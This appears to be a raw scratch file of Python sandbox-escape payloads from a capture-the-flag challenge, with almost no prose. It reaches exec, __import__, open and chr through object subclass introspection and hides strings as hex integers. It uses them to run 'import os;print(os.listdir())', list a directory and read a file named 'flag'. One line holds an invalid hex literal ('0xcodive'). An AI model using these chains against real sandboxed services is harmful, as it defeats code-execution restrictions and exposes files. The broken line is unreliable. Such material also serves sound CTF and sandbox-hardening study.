(1).__class__.__base__.__subclasses__()[195]()._module.__builtins__

(1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values()


exec:
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][20]


import:
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][6]

open
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][148]


chr:
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)

int to bytes

big:
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)


int:
(1).__class__.__base__.__subclasses__()[2].to_bytes

(1).__class__.__base__.__subclasses__()[2](0xcodive)


# tostring
(1).__class__.__base__.__subclasses__()[2].to_bytes((1).__class__.__base__.__subclasses__()[2](0x6369616f6369616f),8,[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)).decode()


[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][20]((1).__class__.__base__.__subclasses__()[2].to_bytes((1).__class__.__base__.__subclasses__()[2](0x696d706f7274206f733b7072696e74286f732e6c697374646972282929),29,[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)).decode())



[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][6]((1).__class__.__base__.__subclasses__()[2].to_bytes((1).__class__.__base__.__subclasses__()[2](0x6f73),2,[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)).decode()).listdir()


file in flag
[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][148]((1).__class__.__base__.__subclasses__()[2].to_bytes((1).__class__.__base__.__subclasses__()[2](0x666c6167),4,[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)).decode(),(1).__class__.__base__.__subclasses__()[2].to_bytes((1).__class__.__base__.__subclasses__()[2](0x72),1,[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)).decode()).read()

"flag"
(1).__class__.__base__.__subclasses__()[2].to_bytes((1).__class__.__base__.__subclasses__()[2](0x666c6167),4,[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x62)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x69)+[*((1).__class__.__base__.__subclasses__()[195]()._module.__builtins__.values())][14](0x67)).decode()
